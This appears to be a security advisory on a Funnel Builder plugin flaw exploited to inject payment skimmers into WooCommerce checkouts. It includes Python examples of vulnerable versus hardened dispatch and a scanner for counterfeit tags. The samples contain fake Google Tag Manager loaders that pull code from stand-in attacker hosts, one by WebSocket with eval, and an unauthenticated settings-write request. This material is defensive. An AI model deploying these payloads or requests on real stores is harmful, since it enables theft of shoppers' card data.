Critical Vulnerability in Funnel Builder Plugin Exploited to Skim WooCommerce Checkout Data

A critical security flaw in the Funnel Builder plugin for WordPress is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages and steal payment data. The vulnerability affects all versions of the plugin prior to 3.15.0.3; the plugin is used by more than 40,000 WooCommerce stores.

The Dutch e-commerce security firm Sansec recently disclosed details about this exploit. The vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into every checkout page of an affected store. FunnelKit, the developer of Funnel Builder, has addressed this issue by releasing a patch in version 3.15.0.3.

According to Sansec, attackers are embedding counterfeit Google Tag Manager scripts into the plugin’s ‘External Scripts’ setting. These scripts appear as legitimate analytics tags alongside the store’s actual tags but are designed to load a payment skimmer that captures credit card numbers, CVVs, and billing addresses during the checkout process.

The vulnerability stems from a publicly accessible checkout endpoint in Funnel Builder that lets the incoming request name the internal method to execute. Earlier versions neither checked the caller’s permissions nor restricted which methods could be invoked, so an unauthenticated request could reach internal methods that write attacker-supplied data directly into the plugin’s global settings. Because those settings are rendered on every Funnel Builder checkout page, the injected code executes on each of them.
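The dispatch flaw described above, reduced to a minimal model. This is an added example written for this page, not Funnel Builder’s code: the endpoint class, the method names, the settings store and the attacker payload are all assumptions made for illustration. The vulnerable dispatcher calls whatever method the request names; the hardened one keeps an allowlist that separates public from privileged methods and gates the privileged ones behind a capability check and a nonce (stand-ins for WordPress’ current_user_can() and check_ajax_referer()).

```python
# Constructed stand-in for the plugin's stored global settings; in WordPress
# these would live in wp_options. The 'external_scripts' key is assumed.
SETTINGS = {"external_scripts": ""}

# Constructed attacker payload: a tag shaped like a Google Tag Manager loader
# that actually pulls a skimmer from an attacker host (reserved .invalid TLD).
FAKE_GTM_TAG = (
    '<!-- Google Tag Manager --><script async '
    'src="https://cdn.tag-manager.invalid/gtm.js?id=GTM-AB12CD"></script>'
)


class CheckoutEndpoint:
    """Hypothetical public checkout AJAX handler that dispatches by method name.

    Method names and the split between public and admin methods are
    assumptions for illustration, not Funnel Builder's real API.
    """

    PUBLIC_METHODS = frozenset({"get_checkout_fragments"})
    ADMIN_METHODS = frozenset({"update_global_settings"})

    def __init__(self, can_manage_options=False, nonce_valid=False):
        # Stand-ins for WordPress' current_user_can() and check_ajax_referer().
        self.can_manage_options = can_manage_options
        self.nonce_valid = nonce_valid

    def get_checkout_fragments(self, request):
        # Harmless public method: refresh checkout totals.
        return {"fragments": {"order_total": request.get("total", "0.00")}}

    def update_global_settings(self, request):
        # Privileged method: persists whatever the request carries.
        SETTINGS.update(request.get("settings", {}))
        return {"saved": sorted(request.get("settings", {}))}

    def dispatch_vulnerable(self, request):
        # Vulnerable pattern: the request names the method and nothing checks
        # who is calling or whether that method should be reachable at all.
        return getattr(self, request["method"])(request)

    def dispatch_hardened(self, request):
        # Hardened pattern: an allowlist separates public from privileged
        # methods, and privileged ones also require a capability and a nonce.
        method = request.get("method", "")
        if method in self.PUBLIC_METHODS:
            return getattr(self, method)(request)
        if method in self.ADMIN_METHODS:
            if not (self.can_manage_options and self.nonce_valid):
                raise PermissionError("capability or nonce check failed")
            return getattr(self, method)(request)
        raise PermissionError(f"method not exposed: {method!r}")


# The unauthenticated request an attacker would send.
ATTACK_REQUEST = {
    "method": "update_global_settings",
    "settings": {"external_scripts": FAKE_GTM_TAG},
}


def run_attack(dispatcher_name):
    """Replay ATTACK_REQUEST as an anonymous caller against one dispatcher.

    Returns (blocked, external_scripts_after); the settings store is reset first.
    """
    SETTINGS["external_scripts"] = ""
    endpoint = CheckoutEndpoint()  # anonymous: no capability, no nonce
    try:
        getattr(endpoint, dispatcher_name)(ATTACK_REQUEST)
        blocked = False
    except PermissionError:
        blocked = True
    return blocked, SETTINGS["external_scripts"]


if __name__ == "__main__":
    for name in ("dispatch_vulnerable", "dispatch_hardened"):
        blocked, scripts = run_attack(name)
        print(f"{name}: blocked={blocked} external_scripts={scripts[:48]!r}")
```

Against the vulnerable dispatcher the anonymous request lands the fake tag in the settings; against the hardened one it is rejected, while the public method still works for anonymous callers and an administrator with a valid nonce can still save settings. The point of the allowlist is that even a method an attacker can name is unreachable unless it was deliberately exposed.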

In observed instances, attackers have used payloads disguised as Google Tag Manager loaders to deploy JavaScript hosted on remote domains. These scripts establish a WebSocket connection to an attacker-controlled command-and-control server to retrieve a skimmer tailored to the victim’s storefront. The primary objective is to harvest credit card numbers, CVVs, billing addresses, and other personal information entered by customers during checkout.

To mitigate this threat, site owners should update the Funnel Builder plugin to the latest version immediately. They should also review the ‘External Scripts’ section under Settings > Checkout for unfamiliar entries and remove them, since the patch closes the injection path but does not by itself remove a payload that was already stored there. Because the payload lives in the plugin’s settings rather than in a file on disk, a file-integrity scan alone will not surface it.

Sansec notes that disguising skimmers as Google Analytics or Tag Manager code is a recurring tactic among cybercriminals, as it allows malicious scripts to blend in with legitimate tracking tags, making them less likely to be detected during reviews.
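A helper for the review recommended above, which applies the disguise observation directly: an entry that looks like a Google Tag Manager loader is only trustworthy if every host it loads from is one Google actually uses, and no tag loader has a reason to open a WebSocket. This is an added example, not code from Sansec or FunnelKit; the allowlist of Google hosts and the three sample entries are constructed for illustration, and the attacker hosts use the reserved .invalid TLD.

```python
import re
from urllib.parse import urlparse

# Hosts a genuine Google Tag Manager / Analytics tag loads from. This
# allowlist is an assumption: add the vendors your store legitimately uses.
ALLOWED_HOSTS = frozenset({"www.googletagmanager.com", "www.google-analytics.com"})

URL_RE = re.compile(r"""(?:https?|wss?)://[^\s'"<>)]+""", re.IGNORECASE)
GTM_HINT_RE = re.compile(
    r"google\s*tag\s*manager|GTM-[A-Z0-9]+|gtm\.js|dataLayer", re.IGNORECASE
)
WEBSOCKET_RE = re.compile(r"\bnew\s+WebSocket\s*\(|\bwss?://", re.IGNORECASE)


def hosts_in(entry):
    """Hostnames referenced by http(s):// or ws(s):// URLs inside the entry."""
    hosts = set()
    for match in URL_RE.finditer(entry):
        host = urlparse(match.group(0)).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def review_entry(entry):
    """Findings for one External Scripts entry; an empty list means nothing stood out."""
    findings = []
    foreign = sorted(h for h in hosts_in(entry) if h not in ALLOWED_HOSTS)
    if foreign and GTM_HINT_RE.search(entry):
        findings.append(f"GTM-style tag loads from non-Google host(s): {foreign}")
    elif foreign:
        findings.append(f"script references host(s) outside the allowlist: {foreign}")
    if WEBSOCKET_RE.search(entry):
        findings.append("opens a WebSocket, which a tag loader has no reason to do")
    return findings


def review_entries(entries):
    """Map entry index -> findings, keeping only entries with something to report."""
    result = {}
    for index, entry in enumerate(entries):
        findings = review_entry(entry)
        if findings:
            result[index] = findings
    return result


# Constructed sample entries as they might appear in the setting.
GENUINE_GTM = (
    "<!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];"
    "w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});"
    "var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;"
    "j.src='https://www.googletagmanager.com/gtm.js?id='+i;"
    "f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-AB12CD');"
    "</script>"
)
# Same shape as the real loader, but j.src points at the attacker's CDN.
FAKE_GTM = GENUINE_GTM.replace("www.googletagmanager.com", "cdn.gtm-loader.invalid")
# A loader that fetches the skimmer over a WebSocket, as in the observed campaign.
WS_LOADER = (
    "<!-- Google Tag Manager --><script>var ws=new WebSocket('wss://c2.example.invalid/tm');"
    "ws.onmessage=function(e){(0,eval)(e.data);};</script>"
)
SAMPLE_ENTRIES = [GENUINE_GTM, FAKE_GTM, WS_LOADER]

if __name__ == "__main__":
    for index, findings in review_entries(SAMPLE_ENTRIES).items():
        print(f"entry {index}:")
        for finding in findings:
            print(f"  - {finding}")
```

The genuine loader produces no findings; the counterfeit one is flagged because its GTM-shaped wrapper loads from a host that is not Google’s, and the WebSocket loader is flagged twice. Run it over the raw value of the setting split into entries; a tag that passes still deserves a look, since the check only reasons about hosts and obvious WebSocket use, not about what a permitted host serves.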

This disclosure follows recent reports by Sucuri on a campaign in which Joomla websites were compromised with obfuscated PHP backdoors. The backdoors contact attacker-controlled servers for instructions and serve spam content to visitors and search engines without the site owner’s knowledge, trading on the compromised sites’ reputations to push the spam.

In these cases, the malicious scripts act as remote loaders, contacting external servers, sending information about the infected website, and awaiting further instructions. The response from the remote server dictates the content the infected site should serve, allowing attackers to change the behavior of the compromised website at any time without modifying local files again.